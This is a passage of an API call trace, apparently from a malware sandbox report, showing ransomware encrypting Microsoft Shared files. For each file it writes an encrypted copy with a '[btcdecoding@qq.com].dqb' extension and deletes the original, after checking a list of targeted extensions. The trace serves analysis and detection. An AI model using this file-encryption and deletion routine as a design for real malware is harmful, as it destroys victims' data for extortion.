shared\\smart tag\\lists\\1033\\time.xml.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0041.292] GetLastError () returned 0x0 [0041.292] ReadFile (in: hFile=0x178, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x2174, lpOverlapped=0x0) returned 1 [0041.293] WriteFile (in: hFile=0x208, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0x2180, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0x2180, lpOverlapped=0x0) returned 1 [0041.294] ReadFile (in: hFile=0x178, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x0, lpOverlapped=0x0) returned 1 [0041.294] WriteFile (in: hFile=0x208, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0xe4, lpOverlapped=0x0) returned 1 [0041.295] SetEndOfFile (hFile=0x208) returned 1 [0041.295] CloseHandle (hObject=0x208) returned 1 [0041.295] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0041.295] SetEndOfFile (hFile=0x178) returned 1 [0041.296] CloseHandle (hObject=0x178) returned 1 [0041.296] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0041.296] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\time.xml")) returned 1 [0041.297] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML") returned 76 [0041.297] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML") returned 76 [0041.297] lstrlenW (lpString=".doc") returned 4 [0041.297] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0041.297] lstrlenW (lpString=".docx") returned 5 [0041.297] lstrcmpiW (lpString1=".docx", lpString2="E.XML") returned -1 [0041.297] lstrlenW (lpString=".pdf") returned 4 [0041.297] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0041.297] lstrlenW (lpString=".xls") returned 4 [0041.297] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0041.297] lstrlenW (lpString=".xlsx") returned 5 [0041.297] lstrcmpiW (lpString1=".xlsx", lpString2="E.XML") returned -1 [0041.297] lstrlenW (lpString=".ppt") returned 4 [0041.297] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0041.297] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML") returned 76 [0041.297] lstrlenW (lpString=".zip") returned 4 [0041.297] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0041.297] lstrlenW (lpString=".rar") returned 4 [0041.297] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0041.297] lstrlenW (lpString=".bz2") returned 4 [0041.297] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0041.297] lstrlenW (lpString=".7z") returned 3 [0041.297] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0041.297] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML") returned 76 [0041.297] lstrlenW (lpString=".dbf") returned 4 [0041.297] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0041.297] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML") returned 76 [0041.297] lstrlenW (lpString=".1cd") returned 4 [0041.297] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0041.297] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML") returned 76 [0041.297] lstrlenW (lpString=".jpg") returned 4 [0041.297] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0041.298] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML") returned 76 [0041.298] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML") returned 76 [0041.298] lstrlenW (lpString=".doc") returned 4 [0041.298] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0041.298] lstrlenW (lpString=".docx") returned 5 [0041.298] lstrcmpiW (lpString1=".docx", lpString2="E.XML") returned -1 [0041.298] lstrlenW (lpString=".pdf") returned 4 [0041.298] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0041.298] lstrlenW (lpString=".xls") returned 4 [0041.298] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0041.298] lstrlenW (lpString=".xlsx") returned 5 [0041.298] lstrcmpiW (lpString1=".xlsx", lpString2="E.XML") returned -1 [0041.298] lstrlenW (lpString=".ppt") returned 4 [0041.298] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0041.298] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML") returned 76 [0041.298] lstrlenW (lpString=".zip") returned 4 [0041.298] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0041.298] lstrlenW (lpString=".rar") returned 4 [0041.298] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0041.298] lstrlenW (lpString=".bz2") returned 4 [0041.298] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0041.298] lstrlenW (lpString=".7z") returned 3 [0041.298] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0041.298] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML") returned 76 [0041.298] lstrlenW (lpString=".dbf") returned 4 [0041.298] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0041.298] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML") returned 76 [0041.298] lstrlenW (lpString=".1cd") returned 4 [0041.298] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0041.298] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML") returned 76 [0041.298] lstrlenW (lpString=".jpg") returned 4 [0041.298] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0041.298] lstrcmpiW (lpString1=".emf", lpString2=".dqb") returned 1 [0041.298] lstrlenW (lpString="Genko_2.emf") returned 11 [0041.299] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_2.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\genko_2.emf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0042.499] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x2c7ff1c | out: lpFileSize=0x2c7ff1c*=10340) returned 1 [0042.500] CloseHandle (hObject=0x174) returned 1 [0042.500] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_2.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\genko_2.emf")) returned 0x20 [0042.500] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_2.emf.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\genko_2.emf.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0042.500] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_2.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\genko_2.emf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0042.500] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_2.emf") returned 69 [0042.500] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_2.emf") returned 69 [0042.500] lstrlenW (lpString=".doc") returned 4 [0042.500] lstrcmpiW (lpString1=".doc", lpString2=".emf") returned -1 [0042.500] lstrlenW (lpString=".docx") returned 5 [0042.500] lstrcmpiW (lpString1=".docx", lpString2="2.emf") returned -1 [0042.500] lstrlenW (lpString=".pdf") returned 4 [0042.500] lstrcmpiW (lpString1=".pdf", lpString2=".emf") returned 1 [0042.500] lstrlenW (lpString=".xls") returned 4 [0042.500] lstrcmpiW (lpString1=".xls", lpString2=".emf") returned 1 [0042.500] lstrlenW (lpString=".xlsx") returned 5 [0042.500] lstrcmpiW (lpString1=".xlsx", lpString2="2.emf") returned -1 [0042.500] lstrlenW (lpString=".ppt") returned 4 [0042.500] lstrcmpiW (lpString1=".ppt", lpString2=".emf") returned 1 [0042.500] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_2.emf") returned 69 [0042.500] lstrlenW (lpString=".zip") returned 4 [0042.500] lstrcmpiW (lpString1=".zip", lpString2=".emf") returned 1 [0042.500] lstrlenW (lpString=".rar") returned 4 [0042.500] lstrcmpiW (lpString1=".rar", lpString2=".emf") returned 1 [0042.500] lstrlenW (lpString=".bz2") returned 4 [0042.500] lstrcmpiW (lpString1=".bz2", lpString2=".emf") returned -1 [0042.500] lstrlenW (lpString=".7z") returned 3 [0042.500] lstrcmpiW (lpString1=".7z", lpString2="emf") returned -1 [0042.500] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_2.emf") returned 69 [0042.500] lstrlenW (lpString=".dbf") returned 4 [0042.500] lstrcmpiW (lpString1=".dbf", lpString2=".emf") returned -1 [0042.501] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_2.emf") returned 69 [0042.501] lstrlenW (lpString=".1cd") returned 4 [0042.501] lstrcmpiW (lpString1=".1cd", lpString2=".emf") returned -1 [0042.501] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_2.emf") returned 69 [0042.501] lstrlenW (lpString=".jpg") returned 4 [0042.501] lstrcmpiW (lpString1=".jpg", lpString2=".emf") returned 1 [0042.501] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_2.emf") returned 69 [0042.501] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_2.emf") returned 69 [0042.501] lstrlenW (lpString=".doc") returned 4 [0042.501] lstrcmpiW (lpString1=".doc", lpString2=".emf") returned -1 [0042.501] lstrlenW (lpString=".docx") returned 5 [0042.501] lstrcmpiW (lpString1=".docx", lpString2="2.emf") returned -1 [0042.501] lstrlenW (lpString=".pdf") returned 4 [0042.501] lstrcmpiW (lpString1=".pdf", lpString2=".emf") returned 1 [0042.501] lstrlenW (lpString=".xls") returned 4 [0042.501] lstrcmpiW (lpString1=".xls", lpString2=".emf") returned 1 [0042.501] lstrlenW (lpString=".xlsx") returned 5 [0042.501] lstrcmpiW (lpString1=".xlsx", lpString2="2.emf") returned -1 [0042.501] lstrlenW (lpString=".ppt") returned 4 [0042.501] lstrcmpiW (lpString1=".ppt", lpString2=".emf") returned 1 [0042.501] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_2.emf") returned 69 [0042.501] lstrlenW (lpString=".zip") returned 4 [0042.501] lstrcmpiW (lpString1=".zip", lpString2=".emf") returned 1 [0042.501] lstrlenW (lpString=".rar") returned 4 [0042.501] lstrcmpiW (lpString1=".rar", lpString2=".emf") returned 1 [0042.501] lstrlenW (lpString=".bz2") returned 4 [0042.501] lstrcmpiW (lpString1=".bz2", lpString2=".emf") returned -1 [0042.501] lstrlenW (lpString=".7z") returned 3 [0042.501] lstrcmpiW (lpString1=".7z", lpString2="emf") returned -1 [0042.501] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_2.emf") returned 69 [0042.501] lstrlenW (lpString=".dbf") returned 4 [0042.501] lstrcmpiW (lpString1=".dbf", lpString2=".emf") returned -1 [0042.501] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_2.emf") returned 69 [0042.501] lstrlenW (lpString=".1cd") returned 4 [0042.501] lstrcmpiW (lpString1=".1cd", lpString2=".emf") returned -1 [0042.501] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_2.emf") returned 69 [0042.502] lstrlenW (lpString=".jpg") returned 4 [0042.502] lstrcmpiW (lpString1=".jpg", lpString2=".emf") returned 1 [0042.502] lstrcmpiW (lpString1=".jpg", lpString2=".dqb") returned 1 [0042.502] lstrlenW (lpString="HandPrints.jpg") returned 14 [0042.502] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\handprints.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0042.503] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x2c7ff1c | out: lpFileSize=0x2c7ff1c*=4222) returned 1 [0042.503] CloseHandle (hObject=0x174) returned 1 [0042.503] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\handprints.jpg")) returned 0x20 [0042.503] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\handprints.jpg.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0042.503] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\handprints.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0042.503] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg") returned 72 [0042.503] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg") returned 72 [0042.503] lstrlenW (lpString=".doc") returned 4 [0042.503] lstrcmpiW (lpString1=".doc", lpString2=".jpg") returned -1 [0042.503] lstrlenW (lpString=".docx") returned 5 [0042.503] lstrcmpiW (lpString1=".docx", lpString2="s.jpg") returned -1 [0042.503] lstrlenW (lpString=".pdf") returned 4 [0042.503] lstrcmpiW (lpString1=".pdf", lpString2=".jpg") returned 1 [0042.503] lstrlenW (lpString=".xls") returned 4 [0042.503] lstrcmpiW (lpString1=".xls", lpString2=".jpg") returned 1 [0042.503] lstrlenW (lpString=".xlsx") returned 5 [0042.503] lstrcmpiW (lpString1=".xlsx", lpString2="s.jpg") returned -1 [0042.503] lstrlenW (lpString=".ppt") returned 4 [0042.503] lstrcmpiW (lpString1=".ppt", lpString2=".jpg") returned 1 [0042.503] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg") returned 72 [0042.503] lstrlenW (lpString=".zip") returned 4 [0042.503] lstrcmpiW (lpString1=".zip", lpString2=".jpg") returned 1 [0042.503] lstrlenW (lpString=".rar") returned 4 [0042.503] lstrcmpiW (lpString1=".rar", lpString2=".jpg") returned 1 [0042.503] lstrlenW (lpString=".bz2") returned 4 [0042.503] lstrcmpiW (lpString1=".bz2", lpString2=".jpg") returned -1 [0042.503] lstrlenW (lpString=".7z") returned 3 [0042.503] lstrcmpiW (lpString1=".7z", lpString2="jpg") returned -1 [0042.503] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg") returned 72 [0042.504] lstrlenW (lpString=".dbf") returned 4 [0042.504] lstrcmpiW (lpString1=".dbf", lpString2=".jpg") returned -1 [0042.504] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg") returned 72 [0042.504] lstrlenW (lpString=".1cd") returned 4 [0042.504] lstrcmpiW (lpString1=".1cd", lpString2=".jpg") returned -1 [0042.504] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg") returned 72 [0042.504] lstrlenW (lpString=".jpg") returned 4 [0042.504] lstrcmpiW (lpString1=".jpg", lpString2=".jpg") returned 0 [0042.504] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg") returned 72 [0042.504] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg") returned 72 [0042.504] lstrlenW (lpString=".doc") returned 4 [0042.504] lstrcmpiW (lpString1=".doc", lpString2=".jpg") returned -1 [0042.504] lstrlenW (lpString=".docx") returned 5 [0042.504] lstrcmpiW (lpString1=".docx", lpString2="s.jpg") returned -1 [0042.504] lstrlenW (lpString=".pdf") returned 4 [0042.504] lstrcmpiW (lpString1=".pdf", lpString2=".jpg") returned 1 [0042.504] lstrlenW (lpString=".xls") returned 4 [0042.504] lstrcmpiW (lpString1=".xls", lpString2=".jpg") returned 1 [0042.504] lstrlenW (lpString=".xlsx") returned 5 [0042.504] lstrcmpiW (lpString1=".xlsx", lpString2="s.jpg") returned -1 [0042.504] lstrlenW (lpString=".ppt") returned 4 [0042.504] lstrcmpiW (lpString1=".ppt", lpString2=".jpg") returned 1 [0042.504] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg") returned 72 [0042.504] lstrlenW (lpString=".zip") returned 4 [0042.504] lstrcmpiW (lpString1=".zip", lpString2=".jpg") returned 1 [0042.504] lstrlenW (lpString=".rar") returned 4 [0042.504] lstrcmpiW (lpString1=".rar", lpString2=".jpg") returned 1 [0042.504] lstrlenW (lpString=".bz2") returned 4 [0042.504] lstrcmpiW (lpString1=".bz2", lpString2=".jpg") returned -1 [0042.504] lstrlenW (lpString=".7z") returned 3 [0042.504] lstrcmpiW (lpString1=".7z", lpString2="jpg") returned -1 [0042.504] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg") returned 72 [0042.504] lstrlenW (lpString=".dbf") returned 4 [0042.504] lstrcmpiW (lpString1=".dbf", lpString2=".jpg") returned -1 [0042.504] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg") returned 72 [0042.504] lstrlenW (lpString=".1cd") returned 4 [0042.505] lstrcmpiW (lpString1=".1cd", lpString2=".jpg") returned -1 [0042.505] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg") returned 72 [0042.505] lstrlenW (lpString=".jpg") returned 4 [0042.505] lstrcmpiW (lpString1=".jpg", lpString2=".jpg") returned 0 [0042.505] lstrcmpiW (lpString1=".emf", lpString2=".dqb") returned 1 [0042.505] lstrlenW (lpString="Memo.emf") returned 8 [0042.505] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Memo.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\memo.emf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0042.922] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2c7ff1c | out: lpFileSize=0x2c7ff1c*=152300) returned 1 [0042.922] CloseHandle (hObject=0x17c) returned 1 [0042.923] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Memo.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\memo.emf")) returned 0x20 [0042.923] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Memo.emf.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\memo.emf.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0042.923] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Memo.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\memo.emf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0042.923] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Memo.emf") returned 66 [0042.923] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Memo.emf") returned 66 [0042.923] lstrlenW (lpString=".doc") returned 4 [0042.923] lstrcmpiW (lpString1=".doc", lpString2=".emf") returned -1 [0042.923] lstrlenW (lpString=".docx") returned 5 [0042.923] lstrcmpiW (lpString1=".docx", lpString2="o.emf") returned -1 [0042.923] lstrlenW (lpString=".pdf") returned 4 [0042.923] lstrcmpiW (lpString1=".pdf", lpString2=".emf") returned 1 [0042.923] lstrlenW (lpString=".xls") returned 4 [0042.923] lstrcmpiW (lpString1=".xls", lpString2=".emf") returned 1 [0042.923] lstrlenW (lpString=".xlsx") returned 5 [0042.923] lstrcmpiW (lpString1=".xlsx", lpString2="o.emf") returned -1 [0042.923] lstrlenW (lpString=".ppt") returned 4 [0042.923] lstrcmpiW (lpString1=".ppt", lpString2=".emf") returned 1 [0042.923] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Memo.emf") returned 66 [0042.923] lstrlenW (lpString=".zip") returned 4 [0042.923] lstrcmpiW (lpString1=".zip", lpString2=".emf") returned 1 [0042.923] lstrlenW (lpString=".rar") returned 4 [0042.924] lstrcmpiW (lpString1=".rar", lpString2=".emf") returned 1 [0042.924] lstrlenW (lpString=".bz2") returned 4 [0042.924] lstrcmpiW (lpString1=".bz2", lpString2=".emf") returned -1 [0042.924] lstrlenW (lpString=".7z") returned 3 [0042.924] lstrcmpiW (lpString1=".7z", lpString2="emf") returned -1 [0042.924] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Memo.emf") returned 66 [0042.924] lstrlenW (lpString=".dbf") returned 4 [0042.924] lstrcmpiW (lpString1=".dbf", lpString2=".emf") returned -1 [0042.924] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Memo.emf") returned 66 [0042.924] lstrlenW (lpString=".1cd") returned 4 [0042.924] lstrcmpiW (lpString1=".1cd", lpString2=".emf") returned -1 [0042.924] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Memo.emf") returned 66 [0042.924] lstrlenW (lpString=".jpg") returned 4 [0042.924] lstrcmpiW (lpString1=".jpg", lpString2=".emf") returned 1 [0042.924] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Memo.emf") returned 66 [0042.924] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Memo.emf") returned 66 [0042.924] lstrlenW (lpString=".doc") returned 4 [0042.924] lstrcmpiW (lpString1=".doc", lpString2=".emf") returned -1 [0042.924] lstrlenW (lpString=".docx") returned 5 [0042.924] lstrcmpiW (lpString1=".docx", lpString2="o.emf") returned -1 [0042.924] lstrlenW (lpString=".pdf") returned 4 [0042.924] lstrcmpiW (lpString1=".pdf", lpString2=".emf") returned 1 [0042.924] lstrlenW (lpString=".xls") returned 4 [0042.924] lstrcmpiW (lpString1=".xls", lpString2=".emf") returned 1 [0042.924] lstrlenW (lpString=".xlsx") returned 5 [0042.924] lstrcmpiW (lpString1=".xlsx", lpString2="o.emf") returned -1 [0042.924] lstrlenW (lpString=".ppt") returned 4 [0042.924] lstrcmpiW (lpString1=".ppt", lpString2=".emf") returned 1 [0042.924] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Memo.emf") returned 66 [0042.924] lstrlenW (lpString=".zip") returned 4 [0042.924] lstrcmpiW (lpString1=".zip", lpString2=".emf") returned 1 [0042.924] lstrlenW (lpString=".rar") returned 4 [0042.924] lstrcmpiW (lpString1=".rar", lpString2=".emf") returned 1 [0042.924] lstrlenW (lpString=".bz2") returned 4 [0042.925] lstrcmpiW (lpString1=".bz2", lpString2=".emf") returned -1 [0042.925] lstrlenW (lpString=".7z") returned 3 [0042.925] lstrcmpiW (lpString1=".7z", lpString2="emf") returned -1 [0042.925] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Memo.emf") returned 66 [0042.925] lstrlenW (lpString=".dbf") returned 4 [0042.925] lstrcmpiW (lpString1=".dbf", lpString2=".emf") returned -1 [0042.925] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Memo.emf") returned 66 [0042.925] lstrlenW (lpString=".1cd") returned 4 [0042.925] lstrcmpiW (lpString1=".1cd", lpString2=".emf") returned -1 [0042.925] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Memo.emf") returned 66 [0042.925] lstrlenW (lpString=".jpg") returned 4 [0042.925] lstrcmpiW (lpString1=".jpg", lpString2=".emf") returned 1 [0042.925] lstrcmpiW (lpString1=".GIF", lpString2=".dqb") returned 1 [0042.925] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0042.925] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\axis\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0042.987] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2c7ff1c | out: lpFileSize=0x2c7ff1c*=2848) returned 1 [0042.987] CloseHandle (hObject=0x180) returned 1 [0042.987] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\axis\\preview.gif")) returned 0x20 [0042.987] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\PREVIEW.GIF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\axis\\preview.gif.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0042.987] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\axis\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0042.987] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0042.987] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0042.987] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\PREVIEW.GIF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\axis\\preview.gif.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0043.021] GetLastError () returned 0x0 [0043.021] ReadFile (in: hFile=0x180, lpBuffer=0x3760020, 